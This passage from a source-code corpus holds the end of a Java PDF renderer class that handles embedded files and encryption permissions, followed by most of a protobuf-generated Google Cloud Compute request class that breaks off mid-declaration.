} finally { IOUtils.closeQuietly(in); } PDFDictionary dict = new PDFDictionary(); dict.put("F", file); PDFFileSpec fileSpec = new PDFFileSpec(embeddedFile.getFilename(), embeddedFile.getUnicodeFilename()); String filename = fileSpec.getFilename(); pdfDoc.getRoot().addAF(fileSpec); fileSpec.setEmbeddedFile(dict); if (embeddedFile.getDesc() != null) { fileSpec.setDescription(embeddedFile.getDesc()); } this.pdfDoc.registerObject(fileSpec); //Make sure there is an EmbeddedFiles in the Names dictionary PDFEmbeddedFiles embeddedFiles = 
names.getEmbeddedFiles(); if (embeddedFiles == null) { embeddedFiles = new PDFEmbeddedFiles(); this.pdfDoc.assignObjectNumber(embeddedFiles); this.pdfDoc.addTrailerObject(embeddedFiles); names.setEmbeddedFiles(embeddedFiles); } //Add to EmbeddedFiles in the Names dictionary PDFArray nameArray = embeddedFiles.getNames(); if (nameArray == null) { nameArray = new PDFArray(); embeddedFiles.setNames(nameArray); } nameArray.add(filename); nameArray.add(new PDFReference(fileSpec)); } private static final class EncryptionParamsBuilder { private PDFEncryptionParams params; private EncryptionParamsBuilder() { } private PDFEncryptionParams createParams(FOUserAgent userAgent) { params = (PDFEncryptionParams) userAgent.getRendererOptions().get(ENCRYPTION_PARAMS); String userPassword = (String) userAgent.getRendererOption(USER_PASSWORD); if (userPassword != null) { getEncryptionParams().setUserPassword(userPassword); } String ownerPassword = (String) userAgent.getRendererOption(OWNER_PASSWORD); if (ownerPassword != null) { getEncryptionParams().setOwnerPassword(ownerPassword); } Object noPrint = userAgent.getRendererOption(NO_PRINT); if (noPrint != null) { getEncryptionParams().setAllowPrint(!booleanValueOf(noPrint)); } Object noCopyContent = userAgent.getRendererOption(NO_COPY_CONTENT); if (noCopyContent != null) { getEncryptionParams().setAllowCopyContent(!booleanValueOf(noCopyContent)); } Object noEditContent = userAgent.getRendererOption(NO_EDIT_CONTENT); if (noEditContent != null) { getEncryptionParams().setAllowEditContent(!booleanValueOf(noEditContent)); } Object noAnnotations = userAgent.getRendererOption(NO_ANNOTATIONS); if (noAnnotations != null) { getEncryptionParams().setAllowEditAnnotations(!booleanValueOf(noAnnotations)); } Object noFillInForms = userAgent.getRendererOption(NO_FILLINFORMS); if (noFillInForms != null) { getEncryptionParams().setAllowFillInForms(!booleanValueOf(noFillInForms)); } Object noAccessContent = userAgent.getRendererOption(NO_ACCESSCONTENT); 
if (noAccessContent != null) { getEncryptionParams().setAllowAccessContent(!booleanValueOf(noAccessContent)); } Object noAssembleDoc = userAgent.getRendererOption(NO_ASSEMBLEDOC); if (noAssembleDoc != null) { getEncryptionParams().setAllowAssembleDocument(!booleanValueOf(noAssembleDoc)); } Object noPrintHQ = userAgent.getRendererOption(NO_PRINTHQ); if (noPrintHQ != null) { getEncryptionParams().setAllowPrintHq(!booleanValueOf(noPrintHQ)); } return params; } private PDFEncryptionParams getEncryptionParams() { if (params == null) { params = new PDFEncryptionParams(); } return params; } private static boolean booleanValueOf(Object obj) { if (obj instanceof Boolean) { return (Boolean) obj; } else if (obj instanceof String) { return Boolean.valueOf((String) obj); } else { throw new IllegalArgumentException("Boolean or \"true\" or \"false\" expected."); } } } }
googleapis/google-cloud-java
35,895
java-compute/proto-google-cloud-compute-v1/src/main/java/com/google/cloud/compute/v1/RegionInstanceGroupManagerPatchInstanceConfigReq.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/compute/v1/compute.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.compute.v1; /** * * * <pre> * RegionInstanceGroupManagers.patchPerInstanceConfigs * </pre> * * Protobuf type {@code google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq} */ public final class RegionInstanceGroupManagerPatchInstanceConfigReq extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) RegionInstanceGroupManagerPatchInstanceConfigReqOrBuilder { private static final long serialVersionUID = 0L; // Use RegionInstanceGroupManagerPatchInstanceConfigReq.newBuilder() to construct. 
private RegionInstanceGroupManagerPatchInstanceConfigReq( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private RegionInstanceGroupManagerPatchInstanceConfigReq() { perInstanceConfigs_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new RegionInstanceGroupManagerPatchInstanceConfigReq(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.class, com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.Builder .class); } public static final int PER_INSTANCE_CONFIGS_FIELD_NUMBER = 526265001; @SuppressWarnings("serial") private java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> perInstanceConfigs_; /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> getPerInstanceConfigsList() { return perInstanceConfigs_; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public java.util.List<? 
extends com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsOrBuilderList() { return perInstanceConfigs_; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public int getPerInstanceConfigsCount() { return perInstanceConfigs_.size(); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public com.google.cloud.compute.v1.PerInstanceConfig getPerInstanceConfigs(int index) { return perInstanceConfigs_.get(index); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public com.google.cloud.compute.v1.PerInstanceConfigOrBuilder getPerInstanceConfigsOrBuilder( int index) { return perInstanceConfigs_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < perInstanceConfigs_.size(); i++) { output.writeMessage(526265001, perInstanceConfigs_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < perInstanceConfigs_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize( 
526265001, perInstanceConfigs_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq)) { return super.equals(obj); } com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq other = (com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) obj; if (!getPerInstanceConfigsList().equals(other.getPerInstanceConfigsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getPerInstanceConfigsCount() > 0) { hash = (37 * hash) + PER_INSTANCE_CONFIGS_FIELD_NUMBER; hash = (53 * hash) + getPerInstanceConfigsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom( 
com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq 
parseFrom(com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * RegionInstanceGroupManagers.patchPerInstanceConfigs * </pre> * * Protobuf type {@code google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReqOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable 
internalGetFieldAccessorTable() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.class, com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.Builder .class); } // Construct using // com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (perInstanceConfigsBuilder_ == null) { perInstanceConfigs_ = java.util.Collections.emptyList(); } else { perInstanceConfigs_ = null; perInstanceConfigsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_RegionInstanceGroupManagerPatchInstanceConfigReq_descriptor; } @java.lang.Override public com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq getDefaultInstanceForType() { return com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq .getDefaultInstance(); } @java.lang.Override public com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq build() { com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq buildPartial() { com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq result = new 
com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq result) { if (perInstanceConfigsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { perInstanceConfigs_ = java.util.Collections.unmodifiableList(perInstanceConfigs_); bitField0_ = (bitField0_ & ~0x00000001); } result.perInstanceConfigs_ = perInstanceConfigs_; } else { result.perInstanceConfigs_ = perInstanceConfigsBuilder_.build(); } } private void buildPartial0( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) { return mergeFrom( (com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) other); } else { 
super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq other) { if (other == com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq .getDefaultInstance()) return this; if (perInstanceConfigsBuilder_ == null) { if (!other.perInstanceConfigs_.isEmpty()) { if (perInstanceConfigs_.isEmpty()) { perInstanceConfigs_ = other.perInstanceConfigs_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.addAll(other.perInstanceConfigs_); } onChanged(); } } else { if (!other.perInstanceConfigs_.isEmpty()) { if (perInstanceConfigsBuilder_.isEmpty()) { perInstanceConfigsBuilder_.dispose(); perInstanceConfigsBuilder_ = null; perInstanceConfigs_ = other.perInstanceConfigs_; bitField0_ = (bitField0_ & ~0x00000001); perInstanceConfigsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getPerInstanceConfigsFieldBuilder() : null; } else { perInstanceConfigsBuilder_.addAllMessages(other.perInstanceConfigs_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case -84847286: { com.google.cloud.compute.v1.PerInstanceConfig m = input.readMessage( com.google.cloud.compute.v1.PerInstanceConfig.parser(), extensionRegistry); if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(m); } else { perInstanceConfigsBuilder_.addMessage(m); } break; } // case -84847286 default: { if 
(!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> perInstanceConfigs_ = java.util.Collections.emptyList(); private void ensurePerInstanceConfigsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { perInstanceConfigs_ = new java.util.ArrayList<com.google.cloud.compute.v1.PerInstanceConfig>( perInstanceConfigs_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> perInstanceConfigsBuilder_; /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> getPerInstanceConfigsList() { if (perInstanceConfigsBuilder_ == null) { return java.util.Collections.unmodifiableList(perInstanceConfigs_); } else { return perInstanceConfigsBuilder_.getMessageList(); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public int getPerInstanceConfigsCount() { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.size(); } else { return perInstanceConfigsBuilder_.getCount(); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig getPerInstanceConfigs(int index) { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.get(index); } else { return perInstanceConfigsBuilder_.getMessage(index); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder setPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.set(index, value); onChanged(); } else { perInstanceConfigsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder setPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.set(index, builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs(com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(value); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(index, value); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(index, builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addAllPerInstanceConfigs( java.lang.Iterable<? extends com.google.cloud.compute.v1.PerInstanceConfig> values) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, perInstanceConfigs_); onChanged(); } else { perInstanceConfigsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder clearPerInstanceConfigs() { if (perInstanceConfigsBuilder_ == null) { perInstanceConfigs_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { perInstanceConfigsBuilder_.clear(); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder removePerInstanceConfigs(int index) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.remove(index); onChanged(); } else { perInstanceConfigsBuilder_.remove(index); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder getPerInstanceConfigsBuilder( int index) { return getPerInstanceConfigsFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfigOrBuilder getPerInstanceConfigsOrBuilder( int index) { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.get(index); } else { return perInstanceConfigsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<? extends com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsOrBuilderList() { if (perInstanceConfigsBuilder_ != null) { return perInstanceConfigsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(perInstanceConfigs_); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder addPerInstanceConfigsBuilder() { return getPerInstanceConfigsFieldBuilder() .addBuilder(com.google.cloud.compute.v1.PerInstanceConfig.getDefaultInstance()); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder addPerInstanceConfigsBuilder( int index) { return getPerInstanceConfigsFieldBuilder() .addBuilder(index, com.google.cloud.compute.v1.PerInstanceConfig.getDefaultInstance()); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig.Builder> getPerInstanceConfigsBuilderList() { return getPerInstanceConfigsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsFieldBuilder() { if (perInstanceConfigsBuilder_ == null) { perInstanceConfigsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder>( perInstanceConfigs_, ((bitField0_ & 0x00000001) != 0), getParentForChildren(), isClean()); perInstanceConfigs_ = null; } return perInstanceConfigsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet 
unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) } // @@protoc_insertion_point(class_scope:google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq) private static final com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq(); } public static com.google.cloud.compute.v1.RegionInstanceGroupManagerPatchInstanceConfigReq getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<RegionInstanceGroupManagerPatchInstanceConfigReq> PARSER = new com.google.protobuf.AbstractParser< RegionInstanceGroupManagerPatchInstanceConfigReq>() { @java.lang.Override public RegionInstanceGroupManagerPatchInstanceConfigReq parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException() .setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<RegionInstanceGroupManagerPatchInstanceConfigReq> parser() { return PARSER; } @java.lang.Override public 
